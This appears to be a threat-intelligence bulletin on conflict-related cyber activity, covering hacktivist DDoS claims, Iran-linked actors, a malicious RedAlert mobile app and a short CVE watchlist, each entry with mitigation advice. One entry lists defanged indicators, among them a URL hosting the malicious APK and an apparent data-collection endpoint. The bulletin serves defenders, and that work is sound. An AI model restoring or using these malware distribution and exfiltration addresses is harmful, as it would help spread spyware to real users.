Strengthen phishing defenses through email filtering, user awareness training, and multi-factor authentication. Increase monitoring for suspicious network behavior and unauthorized access attempts. Ensure timely patching of vulnerabilities, implement network segmentation to limit lateral movement, and maintain robust logging and alerting to support rapid incident detection and response. Organizations should review and test incident response procedures to ensure readiness for potential cyber incidents.
Conflict-Driven Cyber Operations / Hacktivist Activity
No IoCs reported
A coordinated military campaign triggered a significant escalation in cyber activity across multiple regions. The situation involved a combination of state-aligned actors, hacktivist collectives, and cybercriminal groups conducting disruptive cyber operations. Observed activity includes phishing campaigns distributing a malicious mobile application masquerading as a legitimate alert app, distributed denial-of-service (DDoS) attacks, infrastructure compromises, and threats targeting organizations and individuals. Analysts also observed coordination among hacktivist groups through centralized channels, highlighting a broader mobilization of cyber actors responding to geopolitical events.
RedAlert (malicious mobile application)
Iran, Israel, Jordan, UAE, Saudi Arabia, Bahrain, Canada, United States
Handala Hack, Cyber Islamic Resistance, NoName057(16), Russian Legion, Tarnished Scorpius
Energy, Finance, Government, Defense, Payment, Industrial
T1566 – Phishing; T1660 – Phishing (Mobile ATT&CK); T1498 – Network Denial of Service; T1190 – Exploit Public-Facing Application; T1041 – Exfiltration Over C2 Channel
High
Strengthen defenses against phishing and mobile malware by educating users to avoid installing applications from untrusted sources and verifying official app publishers. Maintain fully patched and hardened internet-facing systems and deploy web application firewalls and DDoS protection. Implement strong monitoring for anomalous network activity and potential data exfiltration. Maintain reliable offline backups and review incident response and business continuity plans to ensure resilience against coordinated cyber disruptions.
Physical Attack Impacting Cloud Infrastructure / Cyber-Physical Risk Event
No IoCs reported
Physical attacks targeting cloud infrastructure resulted in damage to data center facilities in the UAE and Bahrain, leading to service disruptions affecting multiple cloud services across the Middle East. The incident highlights how physical attacks on critical digital infrastructure can cause cascading effects on organizations relying on cloud services, including application outages, degraded performance, and operational disruption. The event underscores the growing convergence of physical and digital threats affecting critical technology infrastructure.
Not specified
UAE, Bahrain
Not specified
IT, Cloud Services
T1485 – Data Destruction; T1490 – Inhibit System Recovery
High
Organizations relying on cloud services should review disaster recovery and business continuity plans to ensure rapid failover to alternative regions or providers. Implement monitoring and alerting for service disruptions, maintain redundant infrastructure where possible, and ensure backups are securely stored across geographically distributed locations. Data center operators should strengthen physical security controls, including perimeter monitoring, surveillance, and access management, while regularly assessing resilience against cyber-physical threat scenarios.
Conflict-Driven Cyber Activity / Retaliatory Cyber Campaign
No IoCs reported
Following coordinated military operations on February 28, 2026, analysts reported the emergence of a retaliatory cyber campaign associated with the broader conflict. The activity is described as multi-vector and rapidly expanding, indicating a potential escalation of cyber operations alongside physical hostilities. While specific technical details, malware, or intrusion methods were not disclosed, the situation reflects the increasing integration of cyber operations into modern conflict scenarios and highlights the potential for disruption targeting organizations and infrastructure connected to the affected regions.
Not specified
United States, Israel
Not specified
Cross-sector
N/A
Medium
Organizations should review and strengthen incident response and business continuity plans to prepare for potential disruptions to services and infrastructure. Implement network segmentation, enforce multi-factor authentication, and maintain continuous monitoring of network activity. Prioritize patching of critical systems, enhance threat intelligence monitoring, and collaborate with industry and government partners to remain informed of emerging risks associated with ongoing geopolitical developments.
Potential Cyber Counteroffensive / Conflict-Driven Threat Activity
No IoCs reported
Security researchers warn of potential cyber counteroffensive operations following a major military campaign. Multiple Iran-linked threat actors are believed to be preparing disruptive cyber activity targeting critical infrastructure and opportunistic organizations. Observed behavior includes reconnaissance, vulnerability exploitation of internet-facing systems, and staging activity that could precede destructive attacks such as wiper malware or ransomware. Analysts also report the potential for increased botnet-driven disruption and distributed denial-of-service (DDoS) activity as part of broader retaliation campaigns aligned with geopolitical tensions.
Not specified
United States, Israel, Global
Altoufan Team, HANDALA, Banished Kitten, CyberAv3ngers, APT34, MuddyWater, APT42, Cotton Sandstorm, APT35, Agrius, Imperial Kitten
Energy, Telecommunications, Government, Critical Infrastructure, Transportation, Logistics
T1566 – Phishing; T1190 – Exploit Public-Facing Application; T1486 – Data Encrypted for Impact; T1490 – Inhibit System Recovery
High
Prioritize patching of vulnerabilities in internet-facing systems and strengthen monitoring for abnormal network activity. Implement strong multi-factor authentication and reduce external attack surface where possible. Prepare for potential DDoS activity by deploying mitigation services and traffic filtering. Conduct proactive threat hunting for indicators linked to known threat actor tactics, ensure reliable offline backups are maintained, and regularly review incident response and business continuity plans to maintain operational resilience.
Distributed Denial-of-Service (DDoS) Attack Claim
No technical IoCs reported
A threat actor known as 313 Team claimed responsibility for cyberattacks targeting the official websites of the Kuwait Ports Authority and the Ministry of Electricity and Water. According to the claim, the attacks resulted in temporary disruption of the Kuwait Ports Authority website for approximately one hour and a complete shutdown of the Ministry of Electricity and Water website during the attack window. The activity appears to involve disruptive operations against public-facing government services, likely intended to cause service outages and signal operational capability.
Not specified
Kuwait
313 Team / The Islamic Cyber Resistance
Government, Public Services
T1498 – Network Denial of Service
Medium
Implement or reinforce DDoS mitigation services to protect public-facing infrastructure. Monitor network traffic for abnormal spikes and volumetric anomalies indicative of denial-of-service activity. Enable rate limiting and deploy Web Application Firewall (WAF) protections to filter malicious traffic. Establish and regularly test incident response procedures specifically designed for DDoS scenarios to ensure rapid service restoration.
Potential Cyber Counteroffensive / Threat Activity Advisory
No IoCs reported
Analysts warn of potential cyber counteroffensive operations following a major geopolitical escalation. Multiple Iran-linked threat actors are expected to increase cyber operations against critical infrastructure and opportunistically selected organizations globally. Historical behavior indicates these groups may shift from espionage to disruptive or destructive attacks, including wiper malware, ransomware-style operations, vulnerability exploitation, and botnet-driven DDoS campaigns. Recent reporting indicates reconnaissance, probing, and staging activities that may precede broader cyber operations.
Not specified
United States, Israel, Global
Altoufan Team, HANDALA, Banished Kitten, CyberAv3ngers, APT34, MuddyWater, APT42, APT35, Agrius
Energy, Telecommunications, Government, Defense, Transportation, Logistics, Water
T1566 – Phishing; T1190 – Exploit Public-Facing Application; T1486 – Data Encrypted for Impact; T1133 – External Remote Services; T1562 – Impair Defenses
High
Prioritize patching vulnerabilities in internet-facing systems and reduce external attack surface. Strengthen monitoring for reconnaissance and anomalous network activity. Implement multi-factor authentication and intrusion detection systems to prevent unauthorized access. Prepare for potential DDoS activity by deploying mitigation services and traffic filtering. Conduct proactive threat hunting and regularly review incident response plans to maintain resilience against disruptive cyber operations.
Hacktivist Cyber Campaign / Conflict-Driven Cyber Activity
hxxps://www[.]shirideitch[.]com/wp-content/uploads/2022/06/RedAlert[.]apk hxxps://api[.]ra-backup[.]com/analytics/submit[.]php hxxps://bit[.]ly/4tWJhQh
Analysts report a surge in cyber activity linked to multiple hacktivist groups aligned with regional geopolitical narratives. Despite domestic internet disruption affecting coordination of some operations, affiliated groups and external proxies continue launching disruptive campaigns including DDoS attacks, phishing campaigns, ransomware incidents, hack-and-leak operations, and claims of infrastructure compromise. Targets reportedly include government institutions, financial services, defense systems, and critical infrastructure across the Middle East and partner nations. The activity remains dynamic, with continued disruptive and opportunistic cyber operations expected.
RedAlert (malicious APK)
Jordan, Kuwait, Saudi Arabia, United Arab Emirates, Bahrain, Turkey, United States, Canada
Handala Hack; Cyber Islamic Resistance; RipperSec; Cyb3rDrag0nzz; Dark Storm Team (DarkStorm/MRHELL112); FAD Team (Fatimiyoun Cyber Team); Evil Markhors; Sylhet Gang (SG); 313 Team (Islamic Cyber Resistance in Iraq); DieNet
Government, Administration, Defense, Finance, Military, Banking, Energy, Health, Industrial
T1566.002 – Spearphishing Link; T1498 – Network Denial of Service; T1486 – Data Encrypted for Impact; T1485 – Data Destruction; T1041 – Exfiltration Over C2 Channel
High
Strengthen monitoring of internet-facing infrastructure and enable real-time alerting for abnormal activity. Immediately patch and harden exposed systems and enforce multi-factor authentication across privileged accounts. Deploy robust DDoS protection and traffic filtering mechanisms to mitigate volumetric attacks. Conduct regular phishing awareness training to reduce social-engineering risk. Maintain secure offline backups of critical data and test restoration procedures regularly. Continuously monitor for unauthorized access, data-leak claims, or suspicious network behavior and ensure incident response and business continuity plans are ready to address potential disruptions.

Vulnerability Watchlist

Mar 18, 2026

CVE
Product
Severity
Patch Status & Updates
Recommendation
CVE-2026-0231
Cortex XDR Broker VM
Medium (5.7)
Affects Cortex XDR Broker VM versions below 30.0.49. Upgrade available to version 30.0.49 or later.
Upgrade Cortex XDR Broker VM to version 30.0.49 or later; Enable automatic updates to ensure timely security patching; Restrict access to the Broker VM to authorized users only; Limit high-privilege account usage and enforce least privilege; Monitor and audit administrative activities and terminal sessions; Apply network access controls to reduce exposure to internal threats

Mar 17, 2026

CVE
Product
Severity
Patch Status & Updates
Recommendation
Not specified
AWS Bedrock AgentCore Code Interpreter (Sandbox mode)
Not specified
AWS reproduced the finding, deployed and then withdrew an initial fix, and ultimately decided not to address it. The documentation was updated to state that complete isolation is only achieved using VPC mode.
Migrate sensitive workloads to VPC mode; Restrict privileges; Explicitly control DNS resolution
